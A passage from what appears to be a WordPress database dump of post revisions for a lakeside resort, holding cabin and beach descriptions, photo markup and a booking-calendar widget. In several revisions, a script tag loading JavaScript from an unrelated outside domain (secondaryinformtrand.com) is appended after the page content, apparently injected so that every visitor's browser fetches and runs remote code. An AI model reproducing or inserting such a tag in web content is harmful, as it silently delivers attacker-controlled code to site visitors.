http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3938-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3938-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<p><strong>#14</strong><br />Is also one of the newer cabins and is 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom.<br />The deck over looks the lake and this cabin has a fire ring and patio. There is a full kitchen, central air conditioning and television.<br />This is a No Smoking, no Pets unit. test</p>		\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/newCabin14-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/newCabin14-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/newCabin14-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/newCabin14-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3941-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3941-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3941-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3941-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','New Cabins','','inherit','closed','closed','','52-revision-v1','','','2019-04-10 20:14:47','2019-04-11 01:14:47','',52,'http://ashbyresort.com/52-revision-v1/',0,'revision','',0),(806,1,'2019-04-10 20:22:51','2019-04-11 01:22:51','<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Fall-Frenzy-001-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Fall-Frenzy-001-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/Fall-Frenzy-001-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/Fall-Frenzy-001-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3833-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3833-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3833-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3833-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724.jpg 1280w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-1024x683.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-1024x683.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-300x200.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-768x512.jpg 768w, http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-272x182.jpg 272w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760.jpg 1280w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/ashleyslide.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/ashleyslide.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/ashleyslide-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC03045-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC03045-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSC03045-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSC03045-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Walleye11.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Walleye11.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Walleye11-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-124.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-124.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Carly-124-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-107.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-107.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Carly-107-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-092.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-092.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Carly-092-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-106.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-106.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Carly-106-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n		<p>A great way to spend a hot sunny day is on our sandy beach. The beach is shallow and has a slide in the water. <br />For those that like to hang out in deeper water there is a floating raft. <br />Pelican Lake is a 4,000 acre lake but is also a shallow lake and warms up quite early making it a great place to swim all summer.</p><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Swimming','','inherit','closed','closed','','107-revision-v1','','','2019-04-10 20:22:51','2019-04-11 01:22:51','',107,'http://ashbyresort.com/107-revision-v1/',0,'revision','',0),(808,2,'2019-04-17 07:22:18','2019-04-17 12:22:18','<div id=\"pl-88\"  class=\"panel-layout\" ><div id=\"pg-88-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-88-0-0\"  class=\"panel-grid-cell\"  data-weight=\"0.772790055249\" ><div id=\"panel-88-0-0-0\" class=\"so-panel widget widget_text panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><h3 class=\"widget-title\">See what is available this season</h3>			<div class=\"textwidget\">Book your stay by calling (218) 747-2959. The calendar may not be up to date. you can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n		<script>\r\n			var wpdevartBooking1 = {\r\n				booking_id : 1,\r\n				hours_enabled : 0,\r\n				booking_widget : 0,\r\n				show_day_info_on_hover : 0,\r\n				cal_animation_type : \"\",\r\n				booking_widget : 0,\r\n				total : \"Total\",\r\n				price : \"Price\",\r\n				offset : 0,\r\n				position : \"after\",\r\n				night : 0,\r\n				id : 1,\r\n				capcha_error : \"Was not verified by recaptcha\",\r\n				conditions : \'\',\r\n				hours_conditions : \'\',\r\n				hide_price : 0,\r\n				max_item : \"\",\r\n				error_days : \"There are no services available for the period you selected.\",\r\n				error_night : \"You must select at least two days\",\r\n				min : \"1\",\r\n				max : \"1000\",\r\n				min_hour : \"1\",\r\n				max_hour : \"1000\",\r\n				error_min_day : \"You must select at least 1 days\",\r\n				error_max_day : \"You must select  more than 1000 days\",\r\n				error_min_hour : \"You must select at least 1 hour\",\r\n				error_max_hour : \"You must select  more than 1000 hour\",\r\n				error_day : \"There are no services available for this day.\"\r\n			};\r\n		</script>\r\n		<div id=\'booking_calendar_main_container_1\' class=\'booking_calendar_main_container    \' data-total=\'Total\' data-price=\'Price\' data-offset=\'0\' data-position=\'after\' data-night=\'0\' data-id=\'1\' data-booking_id=\'1\'><div class=\'booking_calendar_container\' id=\'booking_calendar_container_1\'><div class=\'wpdevart-load-overlay\'><div class=\'wpdevart-load-image\'><i class=\'fa fa-spinner fa-spin\'></i></div></div><div class=\'error_text_container div-for-clear\'><span class=\'error_text\'></span><span class=\'notice_text_close\'><i class=\'fa fa-close\'></i></span></div><div class=\'booking_calendar_main\'><div class=\"wpda-booking-calendar-head \"><div class=\"wpda-previous\"><a href=\"?date=2019-03\" rel=\"nofollow, noindex\" class=\"wpdevart_link\"><span><</span><span class=\"wpda-month-name\"> Mar </span></a></div><div class=\"current-date-info\"><a href=\"?date=2018-04\" rel=\"nofollow, noindex\" class=\"wpdevart_link prev_year_info\"><</a><span class=\"wpda-current-year\">2019</span><a href=\"?date=2020-04-01\" rel=\"nofollow, noindex\" class=\"wpdevart_link next_year_info\">></a>&nbsp;<span class=\"wpda-current-month\">April</span></div><div class=\"wpda-next\"><a href=\"?date=2019-05-01\" rel=\"nofollow, noindex\" class=\"wpdevart_link\"><span class=\"wpda-month-name\"> May </span><span>></span></a></div></div><div class=\"wpdevart-calendar-container div-for-clear\"><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name week-start\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Monday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Tuesday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Wednesday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Thursday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Friday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Saturday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Sunday</div></div></div><div data-date=\"2019-04-01\" data-dateformat=\"April 1, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">1</div></div></div><div data-date=\"2019-04-02\" data-dateformat=\"April 2, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">2</div></div></div><div data-date=\"2019-04-03\" data-dateformat=\"April 3, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">3</div></div></div><div data-date=\"2019-04-04\" data-dateformat=\"April 4, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">4</div></div></div><div data-date=\"2019-04-05\" data-dateformat=\"April 5, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">5</div></div></div><div data-date=\"2019-04-06\" data-dateformat=\"April 6, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">6</div></div></div><div data-date=\"2019-04-07\" data-dateformat=\"April 7, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">7</div></div></div><div data-date=\"2019-04-08\" data-dateformat=\"April 8, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">8</div></div></div><div data-date=\"2019-04-09\" data-dateformat=\"April 9, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">9</div></div></div><div data-date=\"2019-04-10\" data-dateformat=\"April 10, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">10</div></div></div><div data-date=\"2019-04-11\" data-dateformat=\"April 11, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">11</div></div></div><div data-date=\"2019-04-12\" data-dateformat=\"April 12, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">12</div></div></div><div data-date=\"2019-04-13\" data-dateformat=\"April 13, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">13</div></div></div><div data-date=\"2019-04-14\" data-dateformat=\"April 14, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">14</div></div></div><div data-date=\"2019-04-15\" data-dateformat=\"April 15, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">15</div></div></div><div data-date=\"2019-04-16\" data-dateformat=\"April 16, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">16</div></div></div><div data-date=\"2019-04-17\" data-dateformat=\"April 17, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day current-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">17</div></div></div><div data-date=\"2019-04-18\" data-dateformat=\"April 18, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">18</div></div></div><div data-date=\"2019-04-19\" data-dateformat=\"April 19, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">19</div></div></div><div data-date=\"2019-04-20\" data-dateformat=\"April 20, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">20</div></div></div><div data-date=\"2019-04-21\" data-dateformat=\"April 21, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">21</div></div></div><div data-date=\"2019-04-22\" data-dateformat=\"April 22, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">22</div></div></div><div data-date=\"2019-04-23\" data-dateformat=\"April 23, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">23</div></div></div><div data-date=\"2019-04-24\" data-dateformat=\"April 24, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">24</div></div></div><div data-date=\"2019-04-25\" data-dateformat=\"April 25, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">25</div></div></div><div data-date=\"2019-04-26\" data-dateformat=\"April 26, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">26</div></div></div><div data-date=\"2019-04-27\" data-dateformat=\"April 27, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">27</div></div></div><div data-date=\"2019-04-28\" data-dateformat=\"April 28, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">28</div></div></div><div data-date=\"2019-04-29\" data-dateformat=\"April 29, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">29</div></div></div><div data-date=\"2019-04-30\" data-dateformat=\"April 30, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">30</div></div></div><div data-date=\"2019-05-01\" data-dateformat=\"May 1, 2019\" data-currency=\"&#36;\"  class=\"next-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 1</div></div></div><div data-date=\"2019-05-02\" data-dateformat=\"May 2, 2019\" data-currency=\"&#36;\"  class=\"next-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 2</div></div></div><div data-date=\"2019-05-03\" data-dateformat=\"May 3, 2019\" data-currency=\"&#36;\"  class=\"next-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 3</div></div></div><div data-date=\"2019-05-04\" data-dateformat=\"May 4, 2019\" data-currency=\"&#36;\"  class=\"next-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 4</div></div></div><div data-date=\"2019-05-05\" data-dateformat=\"May 5, 2019\" data-currency=\"&#36;\"  class=\"next-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 5</div></div></div></div><div class=\"wpdevart-hours-container\"  ><div class=\"wpdevart-hours-overlay\"><div class=\"wpdevart-load-image\"><i class=\"fa fa-spinner fa-spin\"></i></div></div><div class=\"wpdevart-hours\"></div></div><div class=\"wpdevart-booking-legends div-for-clear\"><div class=\"wpdevart-legends-available\"><div class=\"legend-text\"><span class=\"legend-div\"></span>-Available</div></div><div class=\"wpdevart-legends-pending\"><div class=\"legend-text\"><span class=\"legend-div\"></span>-Booked</div></div><div class=\"wpdevart-legends-unavailable\"><div class=\"legend-text\"><span class=\"legend-div\"></span>-Unavailable</div></div></div></div></div></div></div>\n		</div></div><div id=\"pgc-88-0-1\"  class=\"panel-grid-cell\"  data-weight=\"0.227209944751\" ><div id=\"panel-88-0-1-0\" class=\"so-panel widget widget_bookingwidget panel-first-child panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" >[siteorigin_widget class=\"BookingWidget\"]<input type=\"hidden\" value=\"{&quot;instance&quot;:{&quot;booking_widget_title&quot;:&quot;&quot;,&quot;booking_widget_show&quot;:&quot;booking_form&quot;,&quot;booking_widget_calendar_count&quot;:&quot;1&quot;,&quot;booking_widget_last_field&quot;:&quot;&quot;,&quot;booking_widget_type&quot;:&quot;&quot;,&quot;so_sidebar_emulator_id&quot;:&quot;bookingwidget-80810001&quot;,&quot;option_name&quot;:&quot;widget_bookingwidget&quot;},&quot;args&quot;:{&quot;before_widget&quot;:&quot;&lt;div id=\\&quot;panel-88-0-1-0\\&quot; class=\\&quot;so-panel widget widget_bookingwidget panel-first-child panel-last-child\\&quot; data-index=\\&quot;1\\&quot; data-style=\\&quot;{&amp;quot;background_display&amp;quot;:&amp;quot;tile&amp;quot;}\\&quot; &gt;&quot;,&quot;after_widget&quot;:&quot;&lt;\\/div&gt;&quot;,&quot;before_title&quot;:&quot;&lt;h3 class=\\&quot;widget-title\\&quot;&gt;&quot;,&quot;after_title&quot;:&quot;&lt;\\/h3&gt;&quot;,&quot;widget_id&quot;:&quot;widget-0-1-0&quot;}}\" />[/siteorigin_widget]</div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Calendar','','inherit','closed','closed','','88-revision-v1','','','2019-04-17 07:22:18','2019-04-17 12:22:18','',88,'http://ashbyresort.com/88-revision-v1/',0,'revision','',0),(809,2,'2019-04-17 07:22:19','2019-04-17 12:22:19','<div id=\"pl-88\"  class=\"panel-layout\" ><div id=\"pg-88-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-88-0-0\"  class=\"panel-grid-cell\"  data-weight=\"0.772790055249\" ><div id=\"panel-88-0-0-0\" class=\"so-panel widget widget_text panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><h3 class=\"widget-title\">See what is available this season</h3>			<div class=\"textwidget\">Book your stay by calling (218) 747-2959. The calendar may not be up to date. you can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n		<script>\r\n			var wpdevartBooking2 = {\r\n				booking_id : 2,\r\n				hours_enabled : 0,\r\n				booking_widget : 0,\r\n				show_day_info_on_hover : 0,\r\n				cal_animation_type : \"\",\r\n				booking_widget : 0,\r\n				total : \"Total\",\r\n				price : \"Price\",\r\n				offset : 0,\r\n				position : \"after\",\r\n				night : 0,\r\n				id : 1,\r\n				capcha_error : \"Was not verified by recaptcha\",\r\n				conditions : \'\',\r\n				hours_conditions : \'\',\r\n				hide_price : 0,\r\n				max_item : \"\",\r\n				error_days : \"There are no services available for the period you selected.\",\r\n				error_night : \"You must select at least two days\",\r\n				min : \"1\",\r\n				max : \"1000\",\r\n				min_hour : \"1\",\r\n				max_hour : \"1000\",\r\n				error_min_day : \"You must select at least 1 days\",\r\n				error_max_day : \"You must select  more than 1000 days\",\r\n				error_min_hour : \"You must select at least 1 hour\",\r\n				error_max_hour : \"You must select  more than 1000 hour\",\r\n				error_day : \"There are no services available for this day.\"\r\n			};\r\n		</script>\r\n		<div id=\'booking_calendar_main_container_2\' class=\'booking_calendar_main_container    \' data-total=\'Total\' data-price=\'Price\' data-offset=\'0\' data-position=\'after\' data-night=\'0\' data-id=\'1\' data-booking_id=\'2\'><div class=\'booking_calendar_container\' id=\'booking_calendar_container_2\'><div class=\'wpdevart-load-overlay\'><div class=\'wpdevart-load-image\'><i class=\'fa fa-spinner fa-spin\'></i></div></div><div class=\'error_text_container div-for-clear\'><span class=\'error_text\'></span><span class=\'notice_text_close\'><i class=\'fa fa-close\'></i></span></div><div class=\'booking_calendar_main\'><div class=\"wpda-booking-calendar-head \"><div class=\"wpda-previous\"><a href=\"?date=2019-03\" rel=\"nofollow, noindex\" class=\"wpdevart_link\"><span><</span><span class=\"wpda-month-name\"> Mar </span></a></div><div class=\"current-date-info\"><a href=\"?date=2018-04\" rel=\"nofollow, noindex\" class=\"wpdevart_link prev_year_info\"><</a><span class=\"wpda-current-year\">2019</span><a href=\"?date=2020-04-01\" rel=\"nofollow, noindex\" class=\"wpdevart_link next_year_info\">></a>&nbsp;<span class=\"wpda-current-month\">April</span></div><div class=\"wpda-next\"><a href=\"?date=2019-05-01\" rel=\"nofollow, noindex\" class=\"wpdevart_link\"><span class=\"wpda-month-name\"> May </span><span>></span></a></div></div><div class=\"wpdevart-calendar-container div-for-clear\"><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name week-start\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Monday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Tuesday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Wednesday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Thursday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Friday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Saturday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Sunday</div></div></div><div data-date=\"2019-04-01\" data-dateformat=\"April 1, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">1</div></div></div><div data-date=\"2019-04-02\" data-dateformat=\"April 2, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">2</div></div></div><div data-date=\"2019-04-03\" data-dateformat=\"April 3, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">3</div></div></div><div data-date=\"2019-04-04\" data-dateformat=\"April 4, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">4</div></div></div><div data-date=\"2019-04-05\" data-dateformat=\"April 5, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">5</div></div></div><div data-date=\"2019-04-06\" data-dateformat=\"April 6, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">6</div></div></div><div data-date=\"2019-04-07\" data-dateformat=\"April 7, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">7</div></div></div><div data-date=\"2019-04-08\" data-dateformat=\"April 8, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">8</div></div></div><div data-date=\"2019-04-09\" data-dateformat=\"April 9, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">9</div></div></div><div data-date=\"2019-04-10\" data-dateformat=\"April 10, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">10</div></div></div><div data-date=\"2019-04-11\" data-dateformat=\"April 